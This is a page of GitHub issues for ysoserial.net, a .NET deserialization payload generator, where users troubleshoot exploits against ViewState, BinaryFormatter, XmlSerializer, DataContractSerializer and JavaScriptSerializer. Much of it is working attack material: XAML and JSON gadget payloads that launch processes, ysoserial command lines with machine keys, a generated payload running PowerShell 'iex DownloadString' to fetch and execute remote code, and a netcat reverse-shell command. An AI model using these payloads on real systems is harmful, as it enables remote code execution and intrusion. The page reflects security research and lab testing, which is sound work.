pwntester / ysoserial.net Goto Github PK
View Code? Open in Web Editor NEWDeserialization payload generator for a variety of .NET formatters
License: MIT License
ysoserial.net's Issues
the exe file considered having a virus
Hello
I'm trying to research vulnerability inside our Azure samples, coming out of BinaryFormatter.
The latest release of the tool doesn't contain ClaimsPrincipal gadget, so I had to clone and build the code.
Immediately after the build .exe file is deleted by Windows Security with next action message:
Any gadget for DataContractJsonSerializer ?
Hi,
I'm looking for a gadget that can be used for the DataContractJsonSerializer Serializer.
If there is any, I can test it and include it into the tool.
Thanks,
Gerardo
Changing the command argument case in DotNetNukePlugin
I think the command argument ("C|command=") should be in lowercase ("c|command=") for /ysoserial/Plugins/DotNetNukePlugin.cs to match the rest of the tool.
Detection without out-of-band interaction
Hello,
I'm training on deserialization and I'm currently on .NET, so already thank you for this tool and your conferences, it helped me a lot.
After having created a simple lab with a deserialization in a viewstate (MAC not enabled / Viewstate not encrypted), I wonder if it is possible to block the execution of the thread in cases where an out of band detection is not possible ?
For example, if I generate the payload with the following command, the output will be written to the specified file.
.\ysoserial.exe -o base64 -g TypeConfuseDelegate -f LosFormatter -c "echo 1234 > C:/Windows/temp/exploit.txt"
I can also have a DNS request with the following payload
.\ysoserial.exe -o base64 -g TypeConfuseDelegate -f LosFormatter -c "ping my.server.tld -n 10"
But if I do a sleep, the command will be transparent because it is executed in a thread, is it possible to block the thread ? or to do otherwise ? (for example modify the gadget ?)
Regards
XmlSerializer with typeof
Hi there,
I have this .NET code
XmlSerializer xmlSerializer = new XmlSerializer(typeof(String), "http://web.com/a");
XmlTextReader xmlReader = new XmlTextReader(stream)
{
WhitespaceHandling = WhitespaceHandling.None
};
String s = xmlSerializer.Deserialize(xmlReader) as String;
I generated this XML PoC
<?xml version="1.0"?>
<root xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" type="System.Data.Services.Internal.ExpandedWrapper`2[[System.Windows.Markup.XamlReader, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35],[System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35]], System.Data.Services, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089">
<ExpandedWrapperOfXamlReaderObjectDataProvider>
<ExpandedElement/>
<ProjectedProperty0>
<MethodName>Parse</MethodName>
<MethodParameters>
<anyType xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xsi:type="xsd:string">
<ResourceDictionary xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation" xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml" xmlns:System="clr-namespace:System;assembly=mscorlib" xmlns:Diag="clr-namespace:System.Diagnostics;assembly=system">
<ObjectDataProvider x:Key="LaunchCmd" ObjectType="{x:Type Diag:Process}" MethodName="Start">
<ObjectDataProvider.MethodParameters>
<System:String>cmd</System:String>
<System:String>/c calc</System:String>
</ObjectDataProvider.MethodParameters>
</ObjectDataProvider>
</ResourceDictionary>
</anyType>
</MethodParameters>
<ObjectInstance xsi:type="XamlReader"></ObjectInstance>
</ProjectedProperty0>
</ExpandedWrapperOfXamlReaderObjectDataProvider>
</root>
during deserialization I'm getting this error
Unhandled Exception: System.InvalidOperationException: There is an error in XML document (2, 2). ---> System.InvalidOperationException: <root xmlns=''> was not expected.
at Microsoft.Xml.Serialization.GeneratedAssembly.XmlSerializationReaderString.Read1_string()
--- End of inner exception stack trace ---
at System.Xml.Serialization.XmlSerializer.Deserialize(XmlReader xmlReader, String encodingStyle, XmlDeserializationEvents events)
at System.Xml.Serialization.XmlSerializer.Deserialize(XmlReader xmlReader)
at ysoserial.Program.Main(String[] args) in C:\Users\vava\Desktop\hacktools\ysoserial.net-master\ysoserial\Program.cs:line 27
could you help me, how can I fix it? why am I getting this error?
cannot be exploited when in compatibility mode....... compatibilityMode="Framework45"
NetVersion: 4.7.03062
<machineKey compatibilityMode="Framework45" decryptionKey="AutoGenerate,IsolateApps" validationKey="AutoGenerate,IsolateApps" />
ysoserial.exe -p ViewState -g ActivitySurrogateSelectorFromFile -c "test.cs;System.dll;System.IO.dll;System.Web.dll" --validationalg="HMACSHA256" --validationkey="9E23971A70539C4C5D1EFE2FACD22B03C2BCE8414D6FB1D1308F5A47C839808EC7C8156654AB8FB14CB643B7954C3956191C7690F0F4EF5104C1E93EA3540871" --decryptionalg="Auto" --decryptionkey="9E23971A87F9ED201A833CDEBAF01C9C7DFF2A72B6E1D087" --apppath="/owa" --path="/owa/auth/logon.aspx" --islegacy --isdebug > test.txt
The response is always 200
no compatibility mode
compatibility mode
Find a way to exploit DataContractSerializer if only the expected type is controlled
Although it is written in whitepaper that in DataContractSerializer case it is enough to control the expected type only, the trick with ExpandedWrapper to include the Process into the object's graph doesn't work in the example below:
<?xml version="1.0"?>
<root xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
<item type="System.Data.Services.Internal.ExpandedWrapper`2[[System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35]], System.Data.Services, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089">
<ExpandedWrapperOfProcessObjectDataProviderpaO_SOqJL xmlns="http://schemas.datacontract.org/2004/07/System.Data.Services.Internal" xmlns:i="http://www.w3.org/2001/XMLSchema-instance">
<ExpandedElement i:nil="true" xmlns:a="http://schemas.datacontract.org/2004/07/System.Diagnostics"/>
<ProjectedProperty0 xmlns:a="http://schemas.datacontract.org/2004/07/System.Windows.Data">
<a:MethodName>Start</a:MethodName>
<a:MethodParameters xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays">
<b:anyType i:type="c:string" xmlns:c="http://www.w3.org/2001/XMLSchema">calc</b:anyType>
</a:MethodParameters>
<a:ObjectInstance i:type="b:Process" xmlns:b="http://schemas.datacontract.org/2004/07/System.Diagnostics">
<__identity i:nil="true" xmlns="http://schemas.datacontract.org/2004/07/System"/>
</a:ObjectInstance>
</ProjectedProperty0>
</ExpandedWrapperOfProcessObjectDataProviderpaO_SOqJL>
</item>
</root>
It works only if typeof(Process) is passed as a knownType
var xmlDoc = new XmlDocument();
xmlDoc.Load("testdeser.xml");
foreach (XmlElement xmlItem in xmlDoc.SelectNodes("root/item"))
{
string typeName = xmlItem.GetAttribute("type");
var s = new DataContractSerializer(Type.GetType(typeName), new[] { typeof(Process) });
var reader = new XmlTextReader(new StringReader(xmlItem.InnerXml));
var a = s.ReadObject(reader);
}
Error loadFromRemoteSources
Hello,
I have an error executing a PSObject payload (ASP.NET Core Runtime 2.1.23). Does it means I have to bypass loadFromRemoteSources restrictions on the target too?
ysoserial.exe -f BinaryFormatter -g PSObject -o base64 -c "ping 10.0.0.1" -t
Unhandled Exception: System.NotSupportedException: An attempt was made to load an assembly from a network location which would have caused the assembly to be sandboxed in previous versions of the .NET Framework. This release of the .NET Framework does not enable CAS policy by default, so this load may be dangerous. If this load is not intended to sandbox the assembly, please enable the loadFromRemoteSources switch. See http://go.microsoft.com/fwlink/?LinkId=155569 for more information.
at System.Reflection.RuntimeAssembly.nLoadFile(String path, Evidence evidence)
at System.Reflection.Assembly.LoadFile(String path)
at ysoserial.Generators.PSObjectGenerator.Generate(String formatter, InputArgs inputArgs) in D:\a\ysoserial.net\ysoserial.net\ysoserial\Generators\PSObjectGenerator.cs:line 67
at ysoserial.Generators.GenericGenerator.GenerateWithInit(String formatter, InputArgs inputArgs) in D:\a\ysoserial.net\ysoserial.net\ysoserial\Generators\GenericGenerator.cs:line 68
at ysoserial.Program.Main(String[] args) in D:\a\ysoserial.net\ysoserial.net\ysoserial\Program.cs:line 197
Page.EnableViewStateMac
Is this used within viewgen?
ViewState for .NET 2
Payload mode run_command does not work.
Testing payload mode run_command did not work on a fresh install of DotNetNuke 07.03.04. I will submit a PR with a fix.
JavascriptObjectDeserializer - question
Hi,
im having a question here instead of an issue.
im currently trying to exploit a potential Deserialisation vulnerability in a webapplication which is using JavascriptObjectDeserializer. I tried to exploit the vulnerability with the given JavascriptObjectDeserialize payload given here:
_{
'__type':'System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35',
'MethodName':'Start',
'ObjectInstance':{
'__type':'System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089',
'StartInfo': {
'__type':'System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089',
'FileName':'cmd',
'Arguments':'/c nslookup collaborator.somedomain.com'
}
}
}_
The Web application throws the following error:
_{"Message":"The operation is invalid due to the current state of the object.","StackTrace":" bei System.Web.Script.Serialization.ObjectConverter.ConvertDictionaryToObject(IDictionary`2 dictionary, Type type, JavaScriptSerializer serializer, Boolean throwOnError, Object\u0026 convertedObject)\r\n bei System.Web.Script.Serialization.ObjectConverter.ConvertObjectToTypeInternal(Object o, Type type, JavaScriptSerializer serializer, Boolean throwOnError, Object\u0026 convertedObject)\r\n bei System.Web.Script.Serialization.ObjectConverter.ConvertObjectToTypeMain(Object o, Type type, JavaScriptSerializer serializer, Boolean throwOnError, Object\u0026 convertedObject)\r\n bei System.Web.Script.Serialization.ObjectConverter.ConvertObjectToType(Object o, Type type, JavaScriptSerializer serializer)\r\n at System.Web.Script.Serialization.JavaScriptObjectDeserializer.DeserializeInternal(Int32 depth)\r\n bei System.Web.Script.Serialization.JavaScriptObjectDeserializer.DeserializeDictionary(Int32 depth)\r\n bei System.Web.Script.Serialization.JavaScriptObjectDeserializer.DeserializeInternal(Int32 depth)\r\n bei System.Web.Script.Serialization.JavaScriptObjectDeserializer.DeserializeDictionary(Int32 depth)\r\n bei System.Web.Script.Serialization.JavaScriptObjectDeserializer.DeserializeInternal(Int32 depth)\r\n bei System.Web.Script.Serialization.JavaScriptObjectDeserializer.BasicDeserialize(String input, Int32 depthLimit, JavaScriptSerializer serializer)\r\n bei System.Web.Script.Serialization.JavaScriptSerializer.Deserialize[T](String input)\r\n bei System.Web.Script.Services.RestHandler.ExecuteWebServiceCall(HttpContext context, WebServiceMethodData methodData)","ExceptionType":"System.InvalidOperationException"}_
No DNS-Lookup was executed here. Im just learning how to exploit deserialisation vulnerabilities but from my previous research, i estimate that the application no longer accepts the Object System.Windows.Data.ObjectDataProvider because it has been patched. Do I assume this correctly or should an RCE always be possible if the deserialization fails with an error message?
Unfortunately, I don't have access to source code (black box).
Thank you for your answers.
Greetings
ActivitySurrogateSelector gadget fixed in DotNet 4.8+
It appears that Forshaw's SurrogateSelector gadget has been fixed in newer versions of DotNet. The patch notes are here for reference. I have yet to dig into exactly what has been corrected, but my guess would be some sort of type filtering to prevent the serialization of arbitrary objects.
Attempting to generate a payload on a host with 4.8 installed will produce the following error:
ysoserial.exe -g ActivitySurrogateSelector -f BinaryFormatter -o base64 -c none --test
Unhandled Exception: System.ArgumentException: obj
at System.Workflow.ComponentModel.Serialization.ActivitySurrogateSelector.ObjectSurrogate.GetObjectData(Object obj, SerializationInfo info, StreamingContext context)
at System.Runtime.Serialization.Formatters.Binary.WriteObjectInfo.InitSerialize(Object obj, ISurrogateSelector surrogateSelector, StreamingContext context, SerObjectInfoInit serObjectInfoInit, IFormatterConverter converter, ObjectWriter objectWriter, SerializationBinder binder)
at System.Runtime.Serialization.Formatters.Binary.WriteObjectInfo.Serialize(Object obj, ISurrogateSelector surrogateSelector, StreamingContext context, SerObjectInfoInit serObjectInfoInit, IFormatterConverter converter, ObjectWriter objectWriter, SerializationBinder binder)
at System.Runtime.Serialization.Formatters.Binary.ObjectWriter.Serialize(Object graph, Header[] inHeaders, __BinaryWriter serWriter, Boolean fCheck)
at System.Runtime.Serialization.Formatters.Binary.BinaryFormatter.Serialize(Stream serializationStream, Object graph, Header[] headers, Boolean fCheck)
at System.Runtime.Serialization.Formatters.Binary.BinaryFormatter.Serialize(Stream serializationStream, Object graph)
at ysoserial.Generators.PayloadClass.GetObjectData(SerializationInfo info, StreamingContext context) in C:\ysoserial.net\ysoserial\Generators\ActivitySurrogateSelectorGenerator.cs:line 117
at System.Runtime.Serialization.Formatters.Binary.WriteObjectInfo.InitSerialize(Object obj, ISurrogateSelector surrogateSelector, StreamingContext context, SerObjectInfoInit serObjectInfoInit, IFormatterConverter converter, ObjectWriter objectWriter, SerializationBinder binder)
at System.Runtime.Serialization.Formatters.Binary.WriteObjectInfo.Serialize(Object obj, ISurrogateSelector surrogateSelector, StreamingContext context, SerObjectInfoInit serObjectInfoInit, IFormatterConverter converter, ObjectWriter objectWriter, SerializationBinder binder)
at System.Runtime.Serialization.Formatters.Binary.ObjectWriter.Serialize(Object graph, Header[] inHeaders, __BinaryWriter serWriter, Boolean fCheck)
at System.Runtime.Serialization.Formatters.Binary.BinaryFormatter.Serialize(Stream serializationStream, Object graph, Header[] headers, Boolean fCheck)
at System.Runtime.Serialization.Formatters.Binary.BinaryFormatter.Serialize(Stream serializationStream, Object graph)
at ysoserial.Generators.GenericGenerator.Serialize(Object cmdobj, String formatter, Boolean test) in C:\ysoserial.net\ysoserial\Generators\GenericGenerator.cs:line 37
at ysoserial.Generators.ActivitySurrogateSelectorGenerator.Generate(String cmd, String formatter, Boolean test) in C:\ysoserial.net\ysoserial\Generators\ActivitySurrogateSelectorGenerator.cs:line 143
at ysoserial.Program.Main(String[] args) in C:\ysoserial.net\ysoserial\Program.cs:line 135
Would the preferred "fix" simply be a note in the help text for the time being?
Cannot build execute file
I tried to build the ysoserial solution but it throwing the errors:
The type or namespace name 'NDesk' could not be found (are you missing a using directive or an assembly reference?)
The type or namespace name 'OptionSet' could not be found (are you missing a using directive or an assembly reference?)
I already installed .Net Framework 4.5.2, tried to rebuild the solution but did not help, what could I miss? Thanks a lot
Creation of a dockerfile
Description
To make ysoserial accessible in multiple platforms (mac, linux, windows), containerizing the code is a good solution. Once it's here, adding it on docker registry can ease the installation processes. The user would only have to pull the image and run it regardless of what is his OS.
Reference
https://puppet.com/docs/pipelines-for-apps/enterprise/docker-c-sharp.html
https://docs.docker.com/engine/examples/dotnetcore/
Gives Permission Denied error while trying to run the ysoserial executable
I am facing an issue with the downloaded pre-compiled executable (1.32 latest release).
When I try to run the executable, it gives a permission denied error like -
-bash: ./ysoserial.exe: Permission denied
I am running it through Cygwin.
Differences in output from plugin DotNetNuke using release 1.32 vs 1.34.
Hi,
I noticed that in using a command like, ysoserial.exe -p DotNetNuke -m run_command -c "powershell.exe iex (New-Object Net.WebClient).DownloadString('https://example.com/helloWorld.ps1')"_ produces a slightly longer output in version 1.32 than 1.34. Along with this, the output from the newer version didn't succeed in executing, but version 1.32 did. The difference in length looks like it is inside of the "anytype" tags.
The outputs are the following:
1.32:
<profile><item key="key" type="System.Data.Services.Internal.ExpandedWrapper2[[System.Web.UI.ObjectStateFormatter, System.Web, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a],[System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35]], System.Data.Services, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089">Deserialize/wEylxIAAQAAAP////8BAAAAAAAAAAwCAAAASVN5c3RlbSwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODkFAQAAAIQBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuU29ydGVkU2V0YDFbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBAAAAAVDb3VudAhDb21wYXJlcgdWZXJzaW9uBUl0ZW1zAAMABgiNAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkNvbXBhcmlzb25Db21wYXJlcmAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQgCAAAAAgAAAAkDAAAAAgAAAAkEAAAABAMAAACNAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkNvbXBhcmlzb25Db21wYXJlcmAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQEAAAALX2NvbXBhcmlzb24DIlN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xkZXIJBQAAABEEAAAAAgAAAAYGAAAAU2lleCAoTmV3LU9iamVjdCBOZXQuV2ViQ2xpZW50KS5Eb3dubG9hZFN0cmluZygnaHR0cHM6Ly9leGFtcGxlLmNvbS9oZWxsb1dvcmxkLnBzMScpBgcAAAAOcG93ZXJzaGVsbC5leGUEBQAAACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyAwAAAAhEZWxlZ2F0ZQdtZXRob2QwB21ldGhvZDEDAwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5L1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9uSG9sZGVyL1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9uSG9sZGVyCQgAAAAJCQAAAAkKAAAABAgAAAAwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5BwAAAAR0eXBlCGFzc2VtYmx5BnRhcmdldBJ0YXJnZXRUeXBlQXNzZW1ibHkOdGFyZ2V0VHlwZU5hbWUKbWV0aG9kTmFtZQ1kZWxlZ2F0ZUVudHJ5AQECAQEBAzBTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyK0RlbGVnYXRlRW50cnkGCwAAALACU3lzdGVtLkZ1bmNgM1tbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MsIFN5c3RlbSwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQYMAAAAS21zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OQoGDQAAAElTeXN0ZW0sIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5Bg4AAAAaU3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MGDwAAAAVTdGFydAkQAAAABAkAAAAvU3lzdGVtLlJlZmxlY3Rpb24uTWVtYmVySW5mb1NlcmlhbGl6YXRpb25Ib2xkZXIHAAAABE5hbWUMQXNzZW1ibHlOYW1lCUNsYXNzTmFtZQlTaWduYXR1cmUKU2lnbmF0dXJlMgpNZW1iZXJUeXBlEEdlbmVyaWNBcmd1bWVudHMBAQEBAQADCA1TeXN0ZW0uVHlwZVtdCQ8AAAAJDQAAAAkOAAAABhQAAAA+U3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MgU3RhcnQoU3lzdGVtLlN0cmluZywgU3lzdGVtLlN0cmluZykGFQAAAD5TeXN0ZW0uRGlhZ25vc3RpY3MuUHJvY2VzcyBTdGFydChTeXN0ZW0uU3RyaW5nLCBTeXN0ZW0uU3RyaW5nKQgAAAAKAQoAAAAJAAAABhYAAAAHQ29tcGFyZQkMAAAABhgAAAANU3lzdGVtLlN0cmluZwYZAAAAK0ludDMyIENvbXBhcmUoU3lzdGVtLlN0cmluZywgU3lzdGVtLlN0cmluZykGGgAAADJTeXN0ZW0uSW50MzIgQ29tcGFyZShTeXN0ZW0uU3RyaW5nLCBTeXN0ZW0uU3RyaW5nKQgAAAAKARAAAAAIAAAABhsAAABxU3lzdGVtLkNvbXBhcmlzb25gMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0JDAAAAAoJDAAAAAkYAAAACRYAAAAKCw==`
1.34:
<profile><item key="key" type="System.Data.Services.Internal.ExpandedWrapper2[[System.Web.UI.ObjectStateFormatter, System.Web, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a],[System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35]], System.Data.Services, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089">Deserialize/wEy7gcAAQAAAP////8BAAAAAAAAAAwCAAAAXk1pY3Jvc29mdC5Qb3dlclNoZWxsLkVkaXRvciwgVmVyc2lvbj0zLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPTMxYmYzODU2YWQzNjRlMzUFAQAAAEJNaWNyb3NvZnQuVmlzdWFsU3R1ZGlvLlRleHQuRm9ybWF0dGluZy5UZXh0Rm9ybWF0dGluZ1J1blByb3BlcnRpZXMBAAAAD0ZvcmVncm91bmRCcnVzaAECAAAABgMAAACQBjw/eG1sIHZlcnNpb249IjEuMCIgZW5jb2Rpbmc9InV0Zi04Ij8+DQo8T2JqZWN0RGF0YVByb3ZpZGVyIE1ldGhvZE5hbWU9IlN0YXJ0IiBJc0luaXRpYWxMb2FkRW5hYmxlZD0iRmFsc2UiIHhtbG5zPSJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL3dpbmZ4LzIwMDYveGFtbC9wcmVzZW50YXRpb24iIHhtbG5zOnNkPSJjbHItbmFtZXNwYWNlOlN5c3RlbS5EaWFnbm9zdGljczthc3NlbWJseT1TeXN0ZW0iIHhtbG5zOng9Imh0dHA6Ly9zY2hlbWFzLm1pY3Jvc29mdC5jb20vd2luZngvMjAwNi94YW1sIj4NCiAgPE9iamVjdERhdGFQcm92aWRlci5PYmplY3RJbnN0YW5jZT4NCiAgICA8c2Q6UHJvY2Vzcz4NCiAgICAgIDxzZDpQcm9jZXNzLlN0YXJ0SW5mbz4NCiAgICAgICAgPHNkOlByb2Nlc3NTdGFydEluZm8gQXJndW1lbnRzPSIvYyBwb3dlcnNoZWxsLmV4ZSBpZXggKE5ldy1PYmplY3QgTmV0LldlYkNsaWVudCkuRG93bmxvYWRTdHJpbmcoJ2h0dHBzOi8vZXhhbXBsZS5jb20vaGVsbG9Xb3JsZC5wczEnKSIgU3RhbmRhcmRFcnJvckVuY29kaW5nPSJ7eDpOdWxsfSIgU3RhbmRhcmRPdXRwdXRFbmNvZGluZz0ie3g6TnVsbH0iIFVzZXJOYW1lPSIiIFBhc3N3b3JkPSJ7eDpOdWxsfSIgRG9tYWluPSIiIExvYWRVc2VyUHJvZmlsZT0iRmFsc2UiIEZpbGVOYW1lPSJjbWQiIC8+DQogICAgICA8L3NkOlByb2Nlc3MuU3RhcnRJbmZvPg0KICAgIDwvc2Q6UHJvY2Vzcz4NCiAgPC9PYmplY3REYXRhUHJvdmlkZXIuT2JqZWN0SW5zdGFuY2U+DQo8L09iamVjdERhdGFQcm92aWRlcj4L`
Constantly encountering FormatException: Invalid length for a Base-64 char array or string.
Hello,
I'm trying the code execution vulnerability in a lab environment where the validation key and decryption keys are known. Unfortunately, I cannot get it to work no matter what I try.
I'm using .NET 4.0.
I've tried both by setting the ViewStateGenerator and through setting the app path (and I confirm that the ViewStateGenerator value is correct). I have also tried appending ='s at the end of the generated code. I've also tried URL encoding the generated viewstate that I send through the POST request.
Nothing works. I can't even get a single echo 123 > c:\windows\temp\test.txt working. What am I doing wrong?
(I know it should throw a 500 exception, but it should also create test.txt which it doesn't)
Here are some of the codes I have tried:
ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "echo 123 > c:\windows\temp\test.txt" --apppath="/p" --path="/p/default.aspx" --islegacy --validationalg="SHA1" --validationkey="1CAD8CD7D5084010C7AC86E09C048DF2E6351D8E1458173BD2F60C948FDCFC79474E7C4BFB8053B3D599D564C3F8F16CD36D4BFF85DC2B86964E110CAB5529B5" --isdebug
Also tried with giving both keys:
ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "echo 123 > c:\windows\temp\test.txt" --path="/p/default.aspx" --apppath="/p" --decryptionalg="Auto" --decryptionkey="9419E035D0FF7D8038D0DA7A21AFB4482C82E939147FB1C1B1F7EBCDDC69B617" --validationalg="SHA1" --validationkey="1CAD8CD7D5084010C7AC86E09C048DF2E6351D8E1458173BD2F60C948FDCFC79474E7C4BFB8053B3D599D564C3F8F16CD36D4BFF85DC2B86964E110CAB5529B5"
The generator code for the above path is 333BF894
Thanks!
Is there any gadget for .NET Core?
Quickly tried to make a sample vulnerable .NET Core 2.1 app. It looks like none of the gadget works on .net core :( but maybe I missed something.
033102051731: The given key was not present in the dictionary
i got this error message
033102051731: The given key was not present in the dictionary.
at System.ThrowHelper.ThrowKeyNotFoundException()
at System.Collections.Generic.Dictionary`2.get_Item(TKey key)
at Service.Common.Login(String plainText)
my commad
ysoserial.exe -f JavaScriptSerializer -g ObjectDataProvider -o raw -c "calc" -t
ysoserial.exe -f Json.Net -g ObjectDataProvider -o raw -c "calc" -t
and the client send this param to server
{"username":"test","password":"test","deviceId":"698c7e","key":"716cbce586913b54"}
key was the aes key for encryption
am i missing something? or what's wrong with this method? i'm a beginner on asp and json deserialize
thanks
Payload for Mono not working
Hi.
Any idea why the typeconfusedelegatemono doesn't work for me?
I built the supersimple example from https://www.monodevelop.com/documentation/creating-aspnet-projects/ and I run it in xsp4, but the viewstate - which should be MAC enabled but not encrypted, .net 4.0 version, looks weird and the payload generated by ysoserial.net - which is much longer - does not work. I'm using a specific validationkey in web.config for testing.
%2FwEMDAwQAgAADgEMBQMMEAIAAA4BDAUBDBACDA8BAQRUZXh0AQ5Zb3UgY2xpY2tlZCBtZQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAALvN0281sXomxFcIhy33ycX5EfZiafqaB78GIBHdjmVX
Mono Version Information: 6.10.0.104 (tarball Fri Jun 26 19:38:24 UTC 2020); ASP.NET Version: 4.0.30319.42000
Payload generated with:
./ysoserial.exe -p ViewState -g TypeConfuseDelegateMono -c "nc 127.0.0.1 555 -e /bin/bash" --path="/Default.aspx" --apppath="/" --islegacy --validationalg="SHA1" --validationkey="xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx" --isdebug
Any gadget for .NET Core
Tried to make a sample vulnerable .NET Core 3.0 app. It looks like none of the gadget works on .net core.
Got following error message when I used gadgets created by Oleksandr Mirosh, [As per your one of comments on previous similar issue raised by some user].
System.Runtime.Serialization.SerializationException: Unable to find assembly 'Microsoft.PowerShell.Editor, Version=3.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35'.
at System.Runtime.Serialization.Formatters.Binary.BinaryAssemblyInfo.GetAssembly()
at System.Runtime.Serialization.Formatters.Binary.ObjectReader.GetType(BinaryAssemblyInfo assemblyInfo, String name)
at System.Runtime.Serialization.Formatters.Binary.ObjectMap..ctor(String objectName, String[] memberNames, BinaryTypeEnum[] binaryTypeEnumA, Object[] typeInformationA, Int32[] memberAssemIds, ObjectReader objectReader, Int32 objectId, BinaryAssemblyInfo assemblyInfo, SizedArray assemIdToAssemblyTable)
at System.Runtime.Serialization.Formatters.Binary.BinaryParser.ReadObjectWithMapTyped(BinaryObjectWithMapTyped record)
at System.Runtime.Serialization.Formatters.Binary.BinaryParser.ReadObjectWithMapTyped(BinaryHeaderEnum binaryHeaderEnum)
at System.Runtime.Serialization.Formatters.Binary.BinaryParser.Run()
at System.Runtime.Serialization.Formatters.Binary.ObjectReader.Deserialize(BinaryParser serParser, Boolean fCheck)
at System.Runtime.Serialization.Formatters.Binary.BinaryFormatter.Deserialize(Stream serializationStream, Boolean check)
at System.Runtime.Serialization.Formatters.Binary.BinaryFormatter.Deserialize(Stream serializationStream)
